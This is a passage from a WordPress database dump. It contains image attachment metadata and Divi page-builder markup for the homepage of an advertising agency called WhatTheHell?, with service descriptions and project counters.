\"image/png\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:28:\"home-office-07-1-400x516.png\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:9:\"image/png\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:28:\"home-office-07-1-480x480.png\";s:5:\"width\";i:480;s:6:\"height\";i:480;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(326,139,'_wp_attached_file','2020/07/home-office-03.jpg'),(327,139,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:400;s:4:\"file\";s:26:\"2020/07/home-office-03.jpg\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"home-office-03-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"home-office-03-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"home-office-03-768x384.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:384;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:26:\"home-office-03-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:26:\"home-office-03-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:26:\"home-office-03-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:26:\"home-office-03-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:26:\"home-office-03-480x240.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(328,140,'_wp_attached_file','2020/07/home-office-04.jpg'),(329,140,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:800;s:4:\"file\";s:26:\"2020/07/home-office-04.jpg\";s:5:\"sizes\";a:9:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"home-office-04-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"home-office-04-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"home-office-04-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:26:\"home-office-04-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:26:\"home-office-04-800x675.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:26:\"home-office-04-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:26:\"home-office-04-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:26:\"home-office-04-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:26:\"home-office-04-480x480.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(332,142,'_wp_attached_file','2020/07/MB-purefront-02.png'),(333,142,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1080;s:6:\"height\";i:618;s:4:\"file\";s:27:\"2020/07/MB-purefront-02.png\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"MB-purefront-02-300x172.png\";s:5:\"width\";i:300;s:6:\"height\";i:172;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:28:\"MB-purefront-02-1024x586.png\";s:5:\"width\";i:1024;s:6:\"height\";i:586;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"MB-purefront-02-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"MB-purefront-02-768x439.png\";s:5:\"width\";i:768;s:6:\"height\";i:439;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:27:\"MB-purefront-02-400x250.png\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:27:\"MB-purefront-02-400x284.png\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:27:\"MB-purefront-02-510x382.png\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:9:\"image/png\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:27:\"MB-purefront-02-400x516.png\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:9:\"image/png\";}s:31:\"et-pb-image--responsive--tablet\";a:4:{s:4:\"file\";s:27:\"MB-purefront-02-980x561.png\";s:5:\"width\";i:980;s:6:\"height\";i:561;s:9:\"mime-type\";s:9:\"image/png\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:27:\"MB-purefront-02-480x275.png\";s:5:\"width\";i:480;s:6:\"height\";i:275;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(334,143,'_wp_attached_file','2020/07/portraits-circle-small_1.png'),(335,143,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:128;s:6:\"height\";i:128;s:4:\"file\";s:36:\"2020/07/portraits-circle-small_1.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(336,144,'_wp_attached_file','2020/07/portraits-circle-small_3.png'),(337,144,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:128;s:6:\"height\";i:128;s:4:\"file\";s:36:\"2020/07/portraits-circle-small_3.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(338,145,'_wp_attached_file','2020/07/portraits-circle-small_2.png'),(339,145,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:128;s:6:\"height\";i:128;s:4:\"file\";s:36:\"2020/07/portraits-circle-small_2.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(340,146,'_wp_attached_file','2020/07/portraits-circle-small_5.png'),(341,146,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:128;s:6:\"height\";i:128;s:4:\"file\";s:36:\"2020/07/portraits-circle-small_5.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(342,134,'_et_pb_built_for_post_type','page'),(343,134,'_et_pb_ab_subjects',''),(344,134,'_et_pb_enable_shortcode_tracking',''),(345,134,'_et_pb_ab_current_shortcode','[et_pb_split_track id=\"134\" /]'),(346,134,'_et_pb_custom_css',''),(347,134,'_et_pb_gutter_width','3'),(348,134,'_thumbnail_id','0'),(349,134,'_et_pb_first_image',''),(350,134,'_et_pb_truncate_post','<p><div class=\"et_pb_section et_pb_section_0 et_animated et_section_regular\" >\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_0 et_pb_row_fullwidth et_animated et_pb_equal_columns et_pb_gutters1\">\n				<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_0  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_text et_pb_text_0 et_animated  et_pb_text_align_left et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\" data-et-multi-view=\"{&quot;schema&quot;:{&quot;content&quot;:{&quot;desktop&quot;:&quot;Welcome to  Advertising Agency&quot;,&quot;tablet&quot;:&quot;&quot;,&quot;phone&quot;:&quot;Welcome to  Advertising&lt;br /&gt;n&quot;}},&quot;slug&quot;:&quot;et_pb_text&quot;}\" data-et-multi-view-load-tablet-hidden=\"true\" data-et-multi-view-load-phone-hidden=\"true\">Welcome to  Advertising Agency</div>\n			</div> <!-- .et_pb_text --><div class=\"et_pb_button_module_wrapper et_pb_button_0_wrapper et_pb_button_alignment_center et_pb_module \">\n				<a class=\"et_pb_button et_pb_custom_button_icon et_pb_button_0 et_animated et_hover_enabled et_pb_bg_layout_light\" href=\"\" data-icon=\"&#x45;\">Learn More</a>\n			</div>\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section --><div class=\"et_pb_section et_pb_section_1 et_section_regular\" >\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_1 et_animated\">\n				<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_1  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_text et_pb_text_1 et_animated  et_pb_text_align_center et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">What we do</div>\n			</div> <!-- .et_pb_text --><div class=\"et_pb_module et_pb_text et_pb_text_2 et_animated  et_pb_text_align_center et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Packed with creative skills; we have been serving as one of the best agencies in the region.</div>\n			</div> <!-- .et_pb_text -->\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row --><div class=\"et_pb_row et_pb_row_2 et_pb_equal_columns et_pb_gutters2\">\n				<div class=\"et_pb_column et_pb_column_1_3 et_pb_column_2  et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_with_border et_pb_module et_pb_blurb et_pb_blurb_0 et_animated  et_pb_text_align_center  et_pb_blurb_position_top et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_blurb_content\">\n					<div class=\"et_pb_main_blurb_image\"><span class=\"et_pb_image_wrap\"><span class=\"et-waypoint et_pb_animation_top et-pb-icon\">&#x6b;</span></span></div>\n					<div class=\"et_pb_blurb_container\">\n						<h4 class=\"et_pb_module_header\"><span>Creative</span></h4>\n						<div class=\"et_pb_blurb_description\">It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</div>\n					</div>\n				</div> <!-- .et_pb_blurb_content -->\n			</div> <!-- .et_pb_blurb -->\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_3 et_pb_column_3  et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_with_border et_pb_module et_pb_blurb et_pb_blurb_1 et_animated  et_pb_text_align_center  et_pb_blurb_position_top et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_blurb_content\">\n					<div class=\"et_pb_main_blurb_image\"><span class=\"et_pb_image_wrap\"><span class=\"et-waypoint et_pb_animation_top et-pb-icon\">&#xe00a;</span></span></div>\n					<div class=\"et_pb_blurb_container\">\n						<h4 class=\"et_pb_module_header\"><span>Media</span></h4>\n						<div class=\"et_pb_blurb_description\">Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</div>\n					</div>\n				</div> <!-- .et_pb_blurb_content -->\n			</div> <!-- .et_pb_blurb -->\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_3 et_pb_column_4  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_with_border et_pb_module et_pb_blurb et_pb_blurb_2 et_animated  et_pb_text_align_center  et_pb_blurb_position_top et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_blurb_content\">\n					<div class=\"et_pb_main_blurb_image\"><span class=\"et_pb_image_wrap\"><span class=\"et-waypoint et_pb_animation_top et-pb-icon\">&#xe00e;</span></span></div>\n					<div class=\"et_pb_blurb_container\">\n						<h4 class=\"et_pb_module_header\"><span>Digital</span></h4>\n						<div class=\"et_pb_blurb_description\">Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</div>\n					</div>\n				</div> <!-- .et_pb_blurb_content -->\n			</div> <!-- .et_pb_blurb -->\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row --><div class=\"et_pb_row et_pb_row_3 et_pb_equal_columns et_pb_gutters2\">\n				<div class=\"et_pb_column et_pb_column_1_3 et_pb_column_5  et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_with_border et_pb_module et_pb_blurb et_pb_blurb_3 et_animated  et_pb_text_align_center  et_pb_blurb_position_top et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_blurb_content\">\n					<div class=\"et_pb_main_blurb_image\"><span class=\"et_pb_image_wrap\"><span class=\"et-waypoint et_pb_animation_top et-pb-icon\">&#xe007;</span></span></div>\n					<div class=\"et_pb_blurb_container\">\n						<h4 class=\"et_pb_module_header\"><span>Business Strategy</span></h4>\n						<div class=\"et_pb_blurb_description\">Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</div>\n					</div>\n				</div> <!-- .et_pb_blurb_content -->\n			</div> <!-- .et_pb_blurb -->\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_3 et_pb_column_6  et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_with_border et_pb_module et_pb_blurb et_pb_blurb_4 et_animated  et_pb_text_align_center  et_pb_blurb_position_top et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_blurb_content\">\n					<div class=\"et_pb_main_blurb_image\"><span class=\"et_pb_image_wrap\"><span class=\"et-waypoint et_pb_animation_top et-pb-icon\">&#xe00d;</span></span></div>\n					<div class=\"et_pb_blurb_container\">\n						<h4 class=\"et_pb_module_header\"><span>Web Design</span></h4>\n						<div class=\"et_pb_blurb_description\">Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</div>\n					</div>\n				</div> <!-- .et_pb_blurb_content -->\n			</div> <!-- .et_pb_blurb -->\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_3 et_pb_column_7  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_with_border et_pb_module et_pb_blurb et_pb_blurb_5 et_animated  et_pb_text_align_center  et_pb_blurb_position_top et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_blurb_content\">\n					<div class=\"et_pb_main_blurb_image\"><span class=\"et_pb_image_wrap\"><span class=\"et-waypoint et_pb_animation_top et-pb-icon\">&#xe00f;</span></span></div>\n					<div class=\"et_pb_blurb_container\">\n						<h4 class=\"et_pb_module_header\"><span>Design/Video/Photo</span></h4>\n						<div class=\"et_pb_blurb_description\">Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</div>\n					</div>\n				</div> <!-- .et_pb_blurb_content -->\n			</div> <!-- .et_pb_blurb -->\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section --><div class=\"et_pb_section et_pb_section_2 et_pb_with_background et_section_regular\" >\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_4 et_animated\">\n				<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_8  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_text et_pb_text_3 et_animated  et_pb_text_align_center et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">Generating New Ideas. Solving real Problems</div>\n			</div> <!-- .et_pb_text --><div class=\"et_pb_module et_pb_text et_pb_text_4 et_animated  et_pb_text_align_center et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</div>\n			</div> <!-- .et_pb_text -->\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row --><div class=\"et_pb_row et_pb_row_5 et_animated\">\n				<div class=\"et_pb_column et_pb_column_1_4 et_pb_column_9  et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_module et_pb_number_counter et_pb_number_counter_0 et_animated  et_pb_text_align_center et_pb_bg_layout_light et_pb_with_title\" data-number-value=\"350\" data-number-separator=\"\">\n				\n				\n				<div class=\"percent\" ><p><span class=\"percent-value\"></span><span class=\"percent-sign\"></span></p></div>\n				<h3 class=\"title\">Projects</h3>\n			</div><!-- .et_pb_number_counter -->\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_4 et_pb_column_10  et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_module et_pb_number_counter et_pb_number_counter_1 et_animated  et_pb_text_align_center et_pb_bg_layout_light et_pb_with_title\" data-number-value=\"62\" data-number-separator=\"\">\n				\n				\n				<div class=\"percent\" ><p><span class=\"percent-value\"></span><span class=\"percent-sign\"></span></p></div>\n				<h3 class=\"title\">Satisfied Clients</h3>\n			</div><!-- .et_pb_number_counter -->\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_4 et_pb_column_11  et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_module et_pb_number_counter et_pb_number_counter_2 et_animated  et_pb_text_align_center et_pb_bg_layout_light et_pb_with_title\" data-number-value=\"16\" data-number-separator=\"\">\n				\n				\n				<div class=\"percent\" ><p><span class=\"percent-value\"></span><span class=\"percent-sign\"></span></p></div>\n				<h3 class=\"title\">Ongoing Projects</h3>\n			</div><!-- .et_pb_number_counter -->\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_4 et_pb_column_12  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_number_counter et_pb_number_counter_3 et_animated  et_pb_text_align_center et_pb_bg_layout_light et_pb_with_title\" data-number-value=\"906\" data-number-separator=\"\">\n				\n				\n				<div class=\"percent\" ><p><span class=\"percent-value\"></span><span class=\"percent-sign\"></span></p></div>\n				<h3 class=\"title\">Cups Of Coffee</h3>\n			</div><!-- .et_pb_number_counter -->\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section --><div class=\"et_pb_section et_pb_section_3 et_section_regular\" >\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_6 et_pb_row_fullwidth et_pb_gutters4\">\n				<div class=\"et_pb_column et_pb_column_1_2 et_pb_column_13  et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_module et_pb_image et_pb_image_0 et_animated et-waypoint\">\n				\n				\n				<span class=\"et_pb_image_wrap \"><img src=\"https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Why-we.jpg?w=1080&#038;ssl=1\" alt=\"creative advertising agency in Delhi\" title=\"Why-we\" data-recalc-dims=\"1\" data-lazy-srcset=\"https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Why-we.jpg?w=800&amp;ssl=1 800w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Why-we.jpg?resize=300%2C233&amp;ssl=1 300w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Why-we.jpg?resize=768%2C597&amp;ssl=1 768w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Why-we.jpg?resize=480%2C373&amp;ssl=1 480w\" data-lazy-sizes=\"(max-width: 800px) 100vw, 800px\" data-lazy-src=\"https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Why-we.jpg?w=1080&amp;is-pending-load=1#038;ssl=1\" srcset=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" class=\" jetpack-lazy-image\"><noscript><img data-lazy-fallback=\"1\" src=\"https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Why-we.jpg?w=1080&#038;ssl=1\" alt=\"creative advertising agency in Delhi\" title=\"Why-we\" srcset=\"https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Why-we.jpg?w=800&ssl=1 800w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Why-we.jpg?resize=300%2C233&ssl=1 300w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Why-we.jpg?resize=768%2C597&ssl=1 768w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Why-we.jpg?resize=480%2C373&ssl=1 480w\" sizes=\"(max-width: 800px) 100vw, 800px\" data-recalc-dims=\"1\"  /></noscript></span>\n			</div>\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_2 et_pb_column_14  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_text et_pb_text_5 et_animated  et_pb_text_align_left et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">Why choose us?</div>\n			</div> <!-- .et_pb_text --><div class=\"et_pb_module et_pb_text et_pb_text_6 et_animated  et_pb_text_align_left et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.<br />\n We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</div>\n			</div> <!-- .et_pb_text --><div class=\"et_pb_button_module_wrapper et_pb_button_1_wrapper  et_pb_module \">\n				<a class=\"et_pb_button et_pb_custom_button_icon et_pb_button_1 et_animated et_hover_enabled et_pb_bg_layout_light\" href=\"#\" data-icon=\"&#x45;\">Learn More</a>\n			</div>\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section --><div class=\"et_pb_section et_pb_section_4 et_pb_with_background et_section_regular\" >\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_7 et_animated\">\n				<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_15  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_text et_pb_text_7 et_animated  et_pb_text_align_center et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">Our Latest Work</div>\n			</div> <!-- .et_pb_text --><div class=\"et_pb_module et_pb_text et_pb_text_8 et_animated  et_pb_text_align_center et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</div>\n			</div> <!-- .et_pb_text -->\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section --><div class=\"et_pb_section et_pb_section_5 et_pb_specialty_fullwidth et_pb_equal_columns et_pb_with_background et_section_specialty\" >\n				\n				\n				\n				<div class=\"et_pb_row et_pb_gutters1\">\n					<div class=\"et_pb_column et_pb_column_1_2 et_pb_column_16    et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_module et_pb_image et_pb_image_1 et_animated et-waypoint\">\n				\n				\n				<a href=\"#\"><span class=\"et_pb_image_wrap has-box-shadow-overlay\"><div class=\"box-shadow-overlay\"></div><img src=\"https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-w.jpg?w=1080&#038;ssl=1\" alt=\"digital agency\" title=\"packaging design by what the hell\" data-recalc-dims=\"1\" data-lazy-srcset=\"https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-w.jpg?w=800&amp;ssl=1 800w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-w.jpg?resize=300%2C300&amp;ssl=1 300w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-w.jpg?resize=150%2C150&amp;ssl=1 150w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-w.jpg?resize=768%2C768&amp;ssl=1 768w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-w.jpg?resize=480%2C480&amp;ssl=1 480w\" data-lazy-sizes=\"(max-width: 800px) 100vw, 800px\" 